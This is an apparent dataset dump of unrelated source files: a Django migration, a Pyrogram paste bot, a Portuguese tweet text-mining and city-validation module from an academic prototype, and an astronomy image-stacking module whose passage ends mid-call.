content stringlengths 5 1.05M |
|---|
# Generated by Django 2.0.9 on 2018-12-05 13:55
from django.db import migrations, models
class Migration(migrations.Migration):
    """Switch Notification.created_at / updated_at to Django-managed
    timestamps (auto_now_add / auto_now)."""

    # Must run after the migration that added Notification.comment.
    dependencies = [
        ('notifications', '0003_notification_comment'),
    ]

    operations = [
        migrations.AlterField(
            model_name='notification',
            name='created_at',
            # Set automatically once, when the row is first created.
            field=models.DateTimeField(auto_now_add=True),
        ),
        migrations.AlterField(
            model_name='notification',
            name='updated_at',
            # Refreshed automatically on every save().
            field=models.DateTimeField(auto_now=True),
        ),
    ]
|
import requests
from pyrogram import Client, filters
from pyrogram.types import Message
from config import prefix
@Client.on_message(filters.command("paste", prefix))
async def dogbin(c: Client, m: Message):
    """Paste the replied-to text or document to del.dog and reply with the URL.

    BUG FIX: in the original, the trailing ``else`` was attached to
    ``if m.reply_to_message.text``, so replying to a document (which has no
    ``.text``) pasted the file AND then wrongly sent the
    "Please Reply to text or document." message. A document with a text
    caption could also be pasted twice. Restructured with a guard clause and
    mutually exclusive branches.
    """
    reply = m.reply_to_message
    if not reply or not (reply.document or reply.text):
        await m.reply_text("Please Reply to text or document.")
        return

    if reply.document:
        # Download the attached document and read it as text.
        path = await reply.download()
        mean = ""
        with open(path, 'rb') as fd:
            for line in fd:
                mean += line.decode('UTF-8') + "\r\n"
    else:
        mean = reply.text

    r = requests.post("https://del.dog/documents",
                      data=mean.encode('UTF-8')).json()
    url = f"https://del.dog/{r['key']}"
    await m.reply_text(url, disable_web_page_preview=True)
|
'''
#################################################################################################
AUTOR: WANDERSON ANTONIO COSTA GOMES
TRABALHO ACADEMICO: VIGILANCIA SOCIOASSISTENCIAL: MONITORAMENTO DE RISCOS E VULNERABILIDADES EM
TEMPO REAL POR MEIO DE MINERAÇÃO DE TEXTO NO TWITTER
UNIVERSIDADE: PONTIFÍCIA UNIVERSIDADE CATÓLICA DE MINAS GERAIS - PUCMINAS (UNID. SÃO GABRIEL)
CIDADE: BELO HORIZONTE / MG - BRASIL ANO: 2020
NOME PROTOTIPO: VISORS - VIGILANCIA SOCIOASSISTENCIAL EM REDES SOCIAIS
PALAVRAS-CHAVE: Vigilância Socioassistencial. Monitoramento em Tempo Real. Mineração de Dados.
Mineração de Texto.
#################################################################################################
'''
# ================================== ATENÇÃO ==========================================
# Para utilização desta aplicação é necessário obter as bibliotecas abaixo:
# sklearn - Disponível em <https://scikit-learn.org/stable/index.html>
# nltk - Disponível em <https://www.nltk.org/>
# pandas - Disponível em <https://pandas.pydata.org/pandas-docs/stable/getting_started/install.html>
# numpy - Disponível em <https://numpy.org/install/>
# matplotlib - Disponível em <https://matplotlib.org/3.3.3/users/installing.html>
# time - Disponível em <https://pypi.org/project/times/>
# pickle - Disponível em <https://pypi.org/project/pickle5/>
# wordcloud - Disponível em <https://pypi.org/project/wordcloud/>
# pymysql - Disponível em <https://pypi.org/project/PyMySQL/>
# tweepy - Disponível em <http://docs.tweepy.org/en/latest/install.html>
# ================================================================================================
# -*- coding: utf-8 -*-
from Manipulador_arquivos import Arquivo
import pymysql
from nltk.text import Text
from nltk.tokenize import word_tokenize
import re # re(Regular Expressions) Biblioteca em Python que manipula Expressões Regulares
import nltk
from pickle import dump
from pickle import load
from nltk.corpus import mac_morpho #Importa a biblioteca para etiquetas de classes gramaticais - tagging
from nltk.metrics import accuracy
from interface import interface_terminal as terminal
class Tokenizacao():
    """Tokenization helpers for Portuguese (pt-br) text, plus small
    regex-based word searches."""

    def Token(self, texto):
        """Tokenize a string into words, or each string of a list into word
        lists, using NLTK's Portuguese tokenizer.

        BUG FIX: the original fell through with an UnboundLocalError when
        ``texto`` was neither a str nor a list; raise a descriptive
        TypeError instead.
        """
        if type(texto) == list:
            return [word_tokenize(t, language='portuguese') for t in texto]
        if type(texto) == str:
            return word_tokenize(texto, language='portuguese')
        raise TypeError('texto must be str or list, got %s'
                        % type(texto).__name__)

    def Expressoes_Regulares(self, stem, texto):
        """Return every word in ``texto`` that begins with ``stem``.

        NOTE(review): ``stem`` is interpolated into the pattern unescaped, so
        regex metacharacters in it change the match — callers pass stemmer
        output (plain letters), but confirm before widening usage.
        """
        resultado = re.findall(r'' + stem + r'\w*', texto)
        return resultado

    def Posicao_palavra(self, palavra, texto):
        """Print and return the span of the first occurrence of ``palavra``
        in ``texto`` (as ``str((start, end))``), or None if absent."""
        resultado = re.search(r'' + palavra, texto)
        if resultado != None:
            print('palavra: ' + resultado.group(0) + '\nposição: ' + str(resultado.span()))
            res = str(resultado.span())
        else:
            print('palavra ' + palavra + ' não foi encontrada!')
            res = None
        return res
class AnaliseLexica():
    """Lexical analysis helpers: stopword removal, stemming, and
    punctuation / accent / tweet-noise stripping for Portuguese text."""

    def Remocao_Stopword(self, texto):
        """Tokenize ``texto`` (str or possibly-nested list) and drop NLTK
        Portuguese stopwords plus a custom Twitter-slang stopword set.
        Returns a flat list; stopwords removed from sub-lists, but a top-level
        stopword is appended as '' (empty string) — see the final loop."""
        def __verifica_Type(texto):
            # Normalize the input into token lists, lower-casing first.
            t = Tokenizacao()
            if type(texto) == str:
                token = t.Token(texto.lower())  # tokenized
            elif type(texto) == list:
                for text in texto:
                    if type(text) == list:
                        token = __verifica_Type(text)
                        break
                    elif type(text) == str:
                        # NOTE(review): token is re-created on every iteration,
                        # so only the LAST string of the list survives — looks
                        # unintended; confirm against callers.
                        token = []
                        token.append(t.Token(text.lower()))  # tokenized
            else:
                token = t.Token(texto.lower())
            return token
        lista = []
        def __remocao_stopwords(palavra):
            # Returns '' when palavra is a stopword, otherwise palavra itself.
            stopword = nltk.corpus.stopwords.words('portuguese')
            # Custom Twitter-slang / unaccented stopwords not covered by NLTK.
            stw = set(['vc','voce', 'todos', 'cara', 'onde', 'b', 'fala', 'inteira', 'so', 'sabado', 'caiu', 'domingo','mim', 'ter', 'amg', 'ja', 'toda', 'hoje', 'conta', 'dar', 'sempre', 'ai','h', 'menos','via', 'at', 'ontem', 'assim', 'modo', 'noite', 'olha', 'tarde', 'vou', 'vai', 'to', 'tao', 'tava', 'ta', 'tamo', 'tanta', 'tanto', 'q', 'sei', 'ser', 'pra', 'pq', 'porque', 'quanto', 'ne', 'muitos', 'muitas', 'muito', 'muita', 'nao', 'nada', 'n', 'mesmo', 'mesma', 'live', 'fazer', 'fica', 'ficar', 'ficava', 'fiz', 'enquanto', 'diria', 'diriam', 'dessa', 'desse', 'desses', 'dessas', 'desde', 'cmg', 'acha', 'acho'])
            resposta = ''
            count = 0
            cont = 0
            # Membership could be `palavra in stopword` / `palavra in stw`;
            # kept as explicit loops to preserve the original code exactly.
            for sw in stopword:
                if palavra == sw:
                    count +=1
                    break
            if count == 0:
                for word in stw:
                    if palavra == word:
                        cont +=1
                        break
            if (count == 0 and cont == 0):
                resposta = palavra
            return resposta
        token = __verifica_Type(texto)
        for palavra in token:
            if type(palavra) == list:
                for word in palavra:
                    t = __remocao_stopwords(word)
                    if len(t) != 0:
                        lista.append(t)
            else:
                # NOTE(review): unlike the list branch, '' results are kept
                # here — stopwords survive as empty strings; confirm intent.
                lista.append(__remocao_stopwords(palavra))
        return lista

    def Stemmers(self, termo):
        """Stem a single Portuguese word with NLTK's RSLP stemmer."""
        stemmer = nltk.stem.RSLPStemmer() # Portuguese stemmer
        resultado = stemmer.stem(termo)
        return resultado

    def Stemmers_lista (self, lista):
        """Stem every word in ``lista``; returns a parallel list."""
        resultado = []
        for word in lista:
            resultado.append(self.Stemmers(word))
        return resultado

    def Remocao_Pontuacao(self, token):
        """Remove punctuation tokens from a (possibly nested) token list.
        Returns a list of lists (one inner list per input token)."""
        lista = []
        def __remove_pontuacao(word):
            Sinais = ['.',',','?','!','-',':',';','...','(',')','[',']','{','}', '&', '\*','``','\“', "\'\'",'…']
            lista = []
            pos = []
            count = 0
            # NOTE(review): for a non-punctuation word this appends the word
            # once per sign tried (up to len(Sinais) copies) before the match
            # check short-circuits — the duplication looks unintended; confirm
            # against downstream consumers before changing.
            for s in Sinais:
                if word == s:
                    pos.append(count)
                    break
                lista.append(word)
                count +=1
            if len(pos) !=0:
                pos.reverse()
                for posicao in pos:
                    lista.pop(posicao)
            return lista
        for word in token:
            if type(word)==list:
                for _word in word:
                    lista.append(__remove_pontuacao(_word))
            else:
                lista.append(__remove_pontuacao(word))
        return lista

    def Remocao_acentuacao(self, termo):
        """Lower-case ``termo`` (str or list of str) and replace accented
        Portuguese characters with their ASCII equivalents.
        Always returns a list, even for a str input."""
        lista = []
        def __remove_acentuacao(termo):
            lista = []
            # Accented character -> unaccented replacement map.
            Normal = {'á': 'a',
                      'â': 'a',
                      'ã': 'a',
                      'à': 'a',
                      'é': 'e',
                      'ê': 'e',
                      'í': 'i',
                      'ó': 'o',
                      'ô': 'o',
                      'ú': 'u',
                      'ç': 'c'}
            for k in termo:
                try:
                    lista.append(Normal[k])
                except KeyError as identifier:
                    # Not an accented char: keep it unchanged.
                    lista.append(k)
            return ''.join(lista)
        if type(termo)==list:
            for term in termo:
                term = term.lower()
                lista.append(__remove_acentuacao(term))
        elif type(termo) == str:
            term = termo.lower()
            lista.append(__remove_acentuacao(term))
        return lista

    def Remocao_acentuacao_lista(self, lista):
        """Apply Remocao_acentuacao to each element; returns a list of lists."""
        res = [self.Remocao_acentuacao(termo) for termo in lista]
        return res

    def __Remocao_caracteres_Tweets(self, tweet):
        """Strip tweet noise from a single string: @mentions, URLs, RT
        markers, hashtags, digits, emoticons, punctuation/symbols and
        redundant whitespace."""
        user = re.compile(r'@\w+')
        site = re.compile(r'\bhttps://\w+[./#]\w+\b')
        site1 = re.compile(r'\bhttps//t.co\/\w+\b') # e.g. https//t.co/iKPoA75HUB
        site2 = re.compile(r'https//t.\w+\b')
        rt = re.compile(r'\bRT\b')
        linha = re.compile(r'\n')
        tab = re.compile(r'\t')
        tags = re.compile(r'#\w+')
        space = re.compile(r'\s\s+')
        space2 = re.compile(r'\B\s')
        space3 = re.compile(r'\s+\B')
        number = re.compile(r'\d')
        reticencias = re.compile(r'\…')
        # NOTE(review): there is no comma after r'\B\%' at the end of the
        # second line below, so Python concatenates it with r'\b\"+' into the
        # single pattern '\B\%\b\"+' — almost certainly a missing comma;
        # confirm before fixing, since it changes which patterns are applied.
        caract = [r'\b\"', r'\"\b', r'\b\-', r'\b\'', r'\'\b', r'\“', r'\”', r'\.', r'\.\.\.',
                  r'\,', r'\?', r'\!', r'\(', r'\)', r'\{', r'\}',r'\[',r'\]', r'\+', r'\*', r'\B\%'
                  r'\b\"+', r'\B\"', r'\"\B', r'\%', r'\\', r'\/', r'\|', r'\<', r'\>', r'\=',
                  r'\B\-', r'\b\‘', r'\B\‘', r'\b\`', r'\B\`', r'\b\ñ', r'\B\ñ', r'\b\º', r'\B\º',
                  r'\b\ª', r'\B\ª', r'\b\_', r'\B\_', r'\b\;', r'\B\;', r'\b\^', r'\~', r'\b\è',
                  r'\_', r'\–', r'\•', r'\#', r'\b\—', r'\B\—', r'\—', r'\°', r'\b\°', r'\B\°',
                  r'\'', r'\B\'', r'\«', r'\b\«', r'\B\«', r'\&', r'\b\&', r'\B\&', r'\¬',
                  r'\b\¬', r'\B\¬', r'\¨', r'\b\¨', r'\B\¨', r'\¢', r'\b\¢', r'\B\¢', r'\£',
                  r'\b\£', r'\B\£' , r'\³', r'\b\³', r'\B\³', r'\³\b', r'\³\B', r'\²', r'\b\²',
                  r'\B\²', r'\²\b', r'\²\B', r'\¹', r'\b\¹', r'\B\¹', r'\¹\b', r'\¹\B', r'\§',
                  r'\b\§', r'\B\§', r'\b\·', r'\B\·', r'\·', r'\^', r'\B\^', r'\ö', r'\b\ö',
                  r'\B\ö', r'\»', r'\b\»', r'\B\»', r'\@', r'\b\@', r'\B\@', r'\€', r'\b\€',
                  r'\B\€', r'\÷', r'\b\÷', r'\B\÷',r'\å', r'\b\å', r'\B\å', r'\×', r'\b\×',
                  r'\B\×', r'\¡', r'\b\¡', r'\B\¡', r'\¿', r'\b\¿', r'\B\¿', r'\´', r'\b\´',
                  r'\B\´', r'\$', r'\b\$', r'\B\$', r'\¥', r'\b\¥', r'\B\¥', r'\¯', r'\b\¯',
                  r'\B\¯', r'\›', r'\b\›',r'\B\›']
        # Runs of 3+ k's (Brazilian laughter, e.g. "kkkk").
        kkk = re.compile(r'\b[k|K]{3,100}')
        tag_especiais = [r'\<',r'\≤' ,r'\≥',r'\&',r'\¤t;',r'\™',r'\>']
        emoticons = [r"\bO:\)\b", r"=D",r":-D", r"=\]", r":-X", r"=^.^=", r":'\(", r":-\)'", r"}:\(", r":-7", r":*",
                     r":-#", r":-\{", r"@\}-;-'--", r":\(", r"=O", r":\)", r"8-\)", r":-\)", r":-\|",
                     r"=p", r":-\\", r";\)", r":-*",r"=B", r"^^", r"D:", r"--'", r"d\(-_-\)b", r"o.O",
                     r"T_T", r"U_U", r"$_$", r"\{\{\{\(>_<\)\}\}\}", r"\/\/.*\)", r"X-\(", r"~:@", r"o\-<\]:",
                     r"\(_8^\(\|\)", r"B^\)"]
        lista_remocao = [kkk, user, site, site1, site2, rt, number, tab, tags, reticencias]
        lista_remocao_espacos = [space2, space3]
        result = tweet
        # Order matters: HTML-ish entities, emoticons, newlines, noise
        # patterns, punctuation, then whitespace collapsing.
        for tesp in tag_especiais:
            t = re.compile(tesp)
            result = re.sub(t, ' ', result)
        for emot in emoticons:
            e = re.compile(emot)
            result = re.sub(e, '', result)
        result = re.sub(linha, ' ', result)
        for er in lista_remocao:
            result = re.sub(er, '', result)
        for item in caract:
            e = re.compile(item)
            result = re.sub(e, ' ', result)
        result = re.sub(space, ' ', result)
        for a in lista_remocao_espacos:
            result = re.sub(a, '', result)
        return result

    def Remocao_caracteres_Tweets(self, tweet):
        """Public wrapper: clean one tweet (str) or a list of tweets.
        For a list input the cleaned list is wrapped in an outer list."""
        if type(tweet) == list:
            resultado = []
            resultado.append([self.__Remocao_caracteres_Tweets(t) for t in tweet])
        else:
            resultado = ''
            resultado = self.__Remocao_caracteres_Tweets(tweet)
        return resultado

    def Remove_Caracteres_Chunk(self, lista_chunks):
        """Strip the NLTK Tree(...) serialization scaffolding from stringified
        chunk trees, leaving the bare words."""
        re0 = re.compile(r'\bTree\(\'A1\',\s\[\(')
        re1 = re.compile(r'[,]\s\'\w+\'\)\]\)')
        re2 = re.compile(r'\s{1,3}')
        lista = [re0, re1, re2]
        result = []
        for item in lista_chunks:
            for j in lista:
                item = re.sub(j , '', item)
            result.append(item)
        return result
class AnaliseSintatica_Semantica():
    """Part-of-speech tagging for Portuguese based on the mac_morpho corpus,
    with pickle persistence of the trained tagger."""

    def __init__(self):
        # Load the labeled sentences from the corpus.
        self.sentencas_etiquetadas = mac_morpho.tagged_sents()
        # # tags = [tag for (word, tag) in mac_morpho.tagged_words()]
        # 'N' (noun) is the most frequent tag in mac_morpho, used as fallback.
        self.padrao = 'N' # nltk.FreqDist(tags).max()

    def Aplicar_Tagging_Padrao(self, sentenca):
        """Tag every token of ``sentenca`` with the default tag ('N')."""
        etiqPadrao = nltk.tag.DefaultTagger(self.padrao)
        return etiqPadrao.tag(sentenca)

    def Aplicar_Tagging_treinamento(self, sentenca):
        """Tag ``sentenca`` with the trained tagger loaded from disk."""
        tagger = self.Carregar_tag()
        result = tagger.tag(sentenca)
        return result

    def Tagging_treinamento(self):
        """Train a backoff chain (Default -> Unigram -> Bigram -> Trigram) on
        mac_morpho and persist the final tagger.

        NOTE(review): ``evaluate`` expects a list of gold tagged sentences,
        but a *tagger* object is being passed here — this likely raises or
        returns nonsense; confirm before relying on the printed scores.
        """
        tagpadrao = nltk.DefaultTagger(self.padrao)
        tag1 = nltk.UnigramTagger(self.sentencas_etiquetadas, backoff=tagpadrao)
        print(tag1.evaluate(tagpadrao))
        tag2 = nltk.BigramTagger(self.sentencas_etiquetadas, backoff=tag1)
        print(tag2.evaluate(tag1))
        tag3 = nltk.TrigramTagger(self.sentencas_etiquetadas, backoff=tag2)
        print(tag3.evaluate(tag2))
        self.Salvar_tag(tag3)

    def Salvar_tag(self, tag):
        """Pickle the trained tagger to arquivos/mac_morpho.pkl."""
        output = open('arquivos/mac_morpho.pkl', 'wb')
        dump(tag, output, -1)
        output.close()
        print('* * * tags salvas...')

    def Carregar_tag(self):
        """Unpickle and return the trained tagger from arquivos/mac_morpho.pkl."""
        Input = open('arquivos/mac_morpho.pkl', 'rb')
        tag = load(Input)
        Input.close()
        return tag
class Extracao_Informacao():
    """Information extraction: sentence segmentation, chunking and named
    entity recognition over tagged Portuguese text."""

    def __init__(self):
        self.tk = Tokenizacao()
        self.ass = AnaliseSintatica_Semantica()

    def __agregarlistas(self, lista):
        # Flatten arbitrarily nested lists into one flat list.
        result = []
        aux = []
        if type(lista) == list:
            for item in lista:
                if type(item) == list:
                    aux = self.__agregarlistas(item)
                    result = result + aux
                else:
                    result.append(item)
        return result

    def Segmentador(self, texto):
        """
        Retorna uma sentença tokenizada, segmentada e etiquetada.
        Em lingua portuguesa Brasil - pt-br
        :parametro texto: texto para tokenização
        :parametro Obj Tokenização: Obj do Analyzer
        :parametro Obj AnaliseSintatica_Semantica: Obj do Analyzer
        """
        # NOTE(review): `|` on two bools works, but `or` would be idiomatic;
        # also, any type other than list/set/str leaves `sent` unbound.
        if ((type(texto) == list) | (type(texto) == set)):
            sent = [nltk.sent_tokenize(t,language='portuguese') for t in texto]
            sent = self.__agregarlistas(sent)
        elif type(texto) == str:
            sent = nltk.sent_tokenize(texto,language='portuguese')
        sent = [self.tk.Token(s) for s in sent]
        sent = [self.ass.Aplicar_Tagging_treinamento(s) for s in sent]
        return sent

    def Chunking(self, regra_gramatical, texto):
        """
        Retorna uma lista de árvores semanticas analisadas conforme a regra gramatical inserida nos parametros.
        Em lingua portuguesa Brasil - pt-br
        :parametro regra_gramatical: uma regra definida para aplicação no texto
        :parametro texto: texto para tokenização
        :parametro Obj Tokenização: Obj do Analyzer
        :parametro Obj AnaliseSintatica_Semantica: Obj do Analyzer
        """
        sent_etiq = self.Segmentador(texto)
        analise_gramatical = nltk.RegexpParser(regra_gramatical)
        chunked = []
        for s in sent_etiq:
            # if type(s) == list:
            #     chunked.append(analise_gramatical.parse(ss) for ss in s)
            # else:
            chunked.append(analise_gramatical.parse(s))
        return chunked

    def NER(self, texto):
        """
        NER (Named Entity Recognition)
        Retorna um Chunking com a identificação de Entidades Nomeadas (Named Entity) conforme a regra gramatical já definida.
        Em lingua portuguesa Brasil - pt-br
        :parametro texto: texto para tokenização
        :parametro Obj Tokenização: Obj do Analyzer
        :parametro Obj AnaliseSintatica_Semantica: Obj do Analyzer
        """
        # Sequences of proper nouns (NPROP) form a named entity.
        NE = r"""NE: {<NPROP>+}"""
        return self.Chunking(NE, texto)

    def Relacionamento_Entidades_Nomeadas(self, texto):
        """Chunk relations of the form NE ... PREP ... NE (two named entities
        linked through a preposition)."""
        gramatica = r""" NE: {<NPROP>+}
                         REL: {<NE> <.*>* <PREP.*> <.*>* <NE>} """
        return self.Chunking(gramatica, texto)
class AnaliseLocalização():
    '''
    Validates city names extracted from tweet locations for geolocation.

    Loads the IBGE Brazilian-municipality files, fetches location columns
    for selected tweets from MySQL, filters/splits the raw location strings
    and records every string that matches a known Brazilian city.
    '''
    def __init__(self):
        self.arq = Arquivo()
        self.analise = AnaliseLexica()
        # Per-letter index file and the full IBGE city list.
        self.arquivo = self.arq.Carregar_Arquivo('arquivos/arq_controle_mun_bra_ibge.csv')
        self.cidades = self.arq.Carregar_Arquivo('arquivos/municipios_brasileiros_ibge.csv')
        self._ids_tweets_localizacao = self.arq.Carregar_Arquivo('arquivos/data/lsa/_ids_tweets_localizacao.txt')
        self.arq_controle_cidades = {}
        self.cidades_validadas = []
        self.Carregar_arq_controle_cidades()
        self.Localizacoes()

    def AgregarListas(self, lista):
        """Flatten an arbitrarily nested list into a single flat list.
        A non-list argument is wrapped in a one-element list."""
        result = []
        if type(lista) == list:
            for item in lista:
                if type(item) == list:
                    result = result + self.AgregarListas(item)
                else:
                    result.append(item)
        else:
            result.append(lista)
        return result

    def _Selecionar_localizacao_tweets_banco_(self, lista_ids_tweets):
        """Fetch user_local, geo, coordinates and place for the given tweet
        ids from MySQL, returning them flattened into one list of strings.

        NOTE: ids are coerced with int(), which keeps the interpolated SQL
        safe here, but a parameterized ``IN (%s, ...)`` clause would be
        preferable. SQL NULLs come back as the string 'None'.
        """
        # 609 leading tweets were discarded, hence the +610 offset.
        clauses = ['id=%i' % (int(item) + 610) for item in lista_ids_tweets]
        conn = pymysql.connect("localhost", "root", "", "tw")
        lista = []
        try:
            c = conn.cursor()
            query = ("SELECT user_local, geo, coordinates, place, tweet "
                     "FROM `selecionados_notrt_tb` WHERE %s" % ' OR '.join(clauses))
            c.execute(query)
            while True:
                res = c.fetchall()
                if not res:
                    break
                for result in res:
                    lista.append(str(result[0]))
                    lista.append(str(result[1]))
                    lista.append(str(result[2]))
                    lista.append(str(result[3]))
            c.close()
        finally:
            # BUG FIX: the connection was never closed in the original.
            conn.close()
        return lista

    def Localizacoes(self):
        """Run the full pipeline: fetch locations, validate them against the
        IBGE city list, persist matches, and print a unique-city summary."""
        terminal.Mensagem('Iniciando em Análise Localização', 'd')
        lista = self._Selecionar_localizacao_tweets_banco_(self._ids_tweets_localizacao)
        # Keep only non-None user_local / geo / coordinates / place values.
        point = [i for i in lista if i != None]
        for item in self.Validacao_cidades(point):
            self.EhCidade(item)
        self.arq.Gravar_Arquivo(self.cidades_validadas, 'arquivos/data/localizacao/arquivo_localizacao.txt')
        print('Arquivo \'arquivo_localizacao.txt\' tamanho: ', len(self.cidades_validadas))
        # BUG FIX: the original dedup loop seeded cids with element [0] and
        # crashed on an empty result; sorted(set(...)) is equivalent and safe.
        cids = sorted(set(self.cidades_validadas))
        print('%i Cidades Brasileiras encontradas.' % len(cids))
        print(cids)

    def Carregar_arq_controle_cidades(self):
        """Build {first_letter: [start_row, end_row]} index over the IBGE
        city file, to narrow the linear search in EhCidade."""
        for linha in self.arquivo:
            linhas = linha.split(',')
            self.arq_controle_cidades.update({linhas[0]: [int(linhas[1]), int(linhas[2])]})

    def Validacao_cidades(self, lista):
        """Filter raw location strings: drop any containing digits (likely
        coordinates) and split multi-part locations on the punctuation found.

        BUG FIX: the original condition used bitwise ``&`` —
        ``count_pont == 0 & count_num == 0`` parses as
        ``count_pont == (0 & count_num) == 0``, so the digit count was
        effectively ignored and coordinate-like strings slipped through.
        """
        aux = []
        sinais = ['.', ',', '?', '!', '-', ':', ';', '...', '(', ')', '[', ']', '{', '}', '&', '*', '``', '“', "''", '…']
        numeros = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
        for local in lista:
            count_num = 0
            count_pont = 0
            sinal = ''
            for caract in local:
                if caract in numeros:
                    count_num += 1
                for pontuacao in sinais:
                    if caract == pontuacao:
                        sinal = pontuacao
                        count_pont += 1
            if count_pont == 0 and count_num == 0:
                aux.append(local)
            if count_pont > 0:
                # Split on the last punctuation sign seen, keep the parts.
                for l in local.split(sinal):
                    aux.append(l)
        return aux

    def EhCidade(self, localidade):
        """Return True (and record the match) if ``localidade`` normalizes to
        a known Brazilian city name; False otherwise."""
        result = False
        loc = self.analise.Remocao_acentuacao(localidade)
        loc = self.analise.Remocao_caracteres_Tweets(loc)
        if type(loc) == list:
            loc = self.AgregarListas(loc)
            if loc[0] == '':
                return False
            local = loc[0]
        else:
            # BUG FIX: the original read `local` before assignment here
            # (NameError); normalize the plain string instead.
            local = re.sub(re.compile(r'\B\s+'), '', loc.upper())
        local = local.upper()
        # Restrict the scan to the rows whose cities share the first letter.
        # NOTE(review): a letter absent from the index raises KeyError, as in
        # the original — confirm whether that can occur with real data.
        letra = local[0]
        inicio = self.arq_controle_cidades[letra][0]
        fim = self.arq_controle_cidades[letra][1]
        i = inicio
        while i < fim:
            city = self.cidades[i - 1].split(',')
            cidade = city[0]
            if local == cidade:
                self.cidades_validadas.append(cidade)
                result = True
                break
            i += 1
        return result
"""
Module to make the image stacking / production occur.
"""
import os
from glob import glob
import astropy.io.fits as pyfits
import numpy as np
import pandas as pd
from tqdm import tqdm
from . import plotting as pl
from . import registration as reg
from . import utils as u
from . import contrast as contrast
class FlatOpeningError(ValueError):
    """Raised when a flat file is missing or is not a FITS file."""
def open_flats(flatfile):
    """
    Opens flats files. Essentially a wrapper around pyfits.getdata that
    also includes a descriptive exception if the file doesn't exist.

    Inputs:
        :flatfile: (str) path to flat to be opened.

    Outputs:
        :flat: (array) data from flat FITS file.

    Raises:
        FlatOpeningError: if the path is not a FITS file or does not exist.
    """
    # Note: this intentionally only checks the trailing characters, so both
    # ".fits" and e.g. "flat.FITS"-less variants ending in "fits" pass, as in
    # the original `flatfile[-4:] != "fits"` check.
    if not flatfile.endswith("fits"):
        raise FlatOpeningError(
            """Currently, SImMER only supports flats in FITS files."""
        )
    if not os.path.exists(flatfile):
        raise FlatOpeningError(
            """The requested flat file can't be found. Please check that you have a flat
file corresponding to every filter used in your observations."""
        )
    return pyfits.getdata(flatfile, 0)
def image_driver(raw_dir, reddir, config, inst, plotting_yml=None):
    """Do flat division, sky subtraction, and initial alignment via coords in header.
    Returns Python list of each registration method used per star.

    Inputs:
        :raw_dir: (string) directory for the raw data
        :reddir: (string) directory for the reduced data
        :config: (pandas DataFrame) dataframe corresponding to config sheet for data.
        :inst: (Instrument object) instrument for which data is being reduced.
        :plotting_yml: (string) path to the plotting configuration file.
    """
    if plotting_yml:
        pl.initialize_plotting(plotting_yml)

    if inst.take_skies:
        skies = config[config.Comments == "sky"]
    else:
        skies = config[
            (config.Object != "flat")
            & (config.Object != "dark")
            & (config.Object != "setup")
        ]
    stars = skies.Object.unique()
    sdirs = glob(reddir + "*/")

    methods = []
    for star in tqdm(
        np.unique(stars), desc="Running image driver", position=0, leave=True
    ):
        s_dir = reddir + star + "/"
        if s_dir not in sdirs:  # make sure there's a subdirectory for each star
            os.mkdir(s_dir)
        filts = skies[
            skies.Object == star
        ].Filter.values  # array of filters as strings
        for n, filter_name in enumerate(filts):
            obj = config[config.Object == star]
            # SECURITY NOTE: eval() on spreadsheet cell contents —
            # ast.literal_eval would be safer if the cells are plain literals.
            imlist = eval(
                obj[obj.Comments != "sky"].Filenums.values[n]
            )  # pylint: disable=eval-used # liter_eval issues
            # cast obj_methods as list so that elementwise comparison isn't performed
            obj_methods = config[config.Object == star].Method.values
            # use pd.isnull because it can check against strings
            if np.all(pd.isnull(obj_methods)):
                methods.append("default")
            else:
                obj_method = obj_methods[~pd.isnull(obj_methods)][0].lower()
                # BUG FIX: the original tested `"saturated" and "wide" in
                # obj_method`, which (since "saturated" is a truthy literal)
                # only checked for "wide" — so plain "wide" methods were
                # misclassified as "saturated wide" and the "wide" branch was
                # unreachable.
                saturated = "saturated" in obj_method
                wide = "wide" in obj_method
                if saturated and wide:
                    methods.append("saturated wide")
                elif saturated:
                    methods.append("saturated")
                elif wide:
                    methods.append("wide")
                else:
                    # Keep `methods` aligned with stars even when the Method
                    # cell contains an unrecognized value.
                    methods.append("default")
            create_imstack(
                raw_dir, reddir, s_dir, imlist, inst, filter_name=filter_name
            )
    return methods
def create_imstack(
    raw_dir, reddir, s_dir, imlist, inst, plotting_yml=None, filter_name=None
):
    """Create the stack of images by performing flat division, sky subtraction.

    Inputs:
        :raw_dir: (string) path to directory containing raw data
        :reddir: (string) path to directory containing reduced data
        :s_dir: (string) path to directory corresponding to a specific star.
        :imlist: (list) list of strings of paths pointing to image files.
        :inst: (Instrument object) instrument for which data is being reduced.
        :plotting_yml: (string) path to the plotting configuration file.
        :filter_name: (string) name of the filter used for the images in question.

    Outputs:
        :im_array: (3d array) array of 2d images.
        :shifts_all: recording of all the x-y shifts made
    """
    if plotting_yml:
        pl.initialize_plotting(plotting_yml)

    nims = len(imlist)
    imfiles = u.make_filelist(raw_dir, imlist, inst)

    # Keep track of original filenames so that we can annotate the shift1_cube
    # image arrays and easily decide which images to exclude
    original_fnames = [os.path.basename(f).split('.')[0] for f in imfiles]

    im_array = u.read_imcube(imfiles)
    im_array = inst.adjust_array(im_array, nims)
    head = inst.head(imfiles[0])
    filt = inst.filt(nims, head, filter_name)

    # if necessary, make directory for filter. Also grab correct flat file
    fdirs = glob(s_dir + "*/")
    sf_dir = s_dir + filt + "/"
    if sf_dir not in fdirs:  # make a directory for each filt
        os.mkdir(sf_dir)

    flatfile = reddir + f"flat_{filt}.fits"
    if (
        inst.name == "PHARO" and filt == "Br-gamma"
    ):  # not sure whether this is generalizable
        flatfile = reddir + "flat_K_short.fits"
    # For ShARCS, use Ks flat instead of BrG-2.16 if necessary
    if inst.name == "ShARCS" and filt == "BrG-2.16" and not os.path.exists(flatfile):
        flatfile = reddir + 'flat_Ks.fits'

    flat = open_flats(flatfile)
    skyfile = sf_dir + "sky.fits"
    sky = pyfits.getdata(skyfile, 0)
    sky[np.isnan(sky)] = 0.0  # set nans from flat=0 pixels to 0 in sky

    # Hoisted out of the per-image loop (it was idempotently re-applied for
    # every image): mark dead flat pixels so division yields NaN there.
    flat[flat == 0] = np.nan

    shifts_all = []
    for i in range(nims):
        # flat division and sky subtraction
        current_im = (
            im_array[i, :, :] / flat
        ) - sky  # where flat = 0, this will be nan
        current_head = pyfits.getheader(imfiles[i])
        # bad pixel correction
        current_im = inst.bad_pix(current_im)
        # now deal with headers and shifts
        shifted_im, shifts = reg.shift_bruteforce(
            current_im
        )  # put it at the center
        shifts_all.append(shifts)
        im_array[i, :, :] = shifted_im
        hdu = pyfits.PrimaryHDU(shifted_im, header=current_head)
        hdu.writeto(
            sf_dir + "sh{:02d}.fits".format(i),
            overwrite=True,
            output_verify="ignore",
        )

    pl.plot_array(
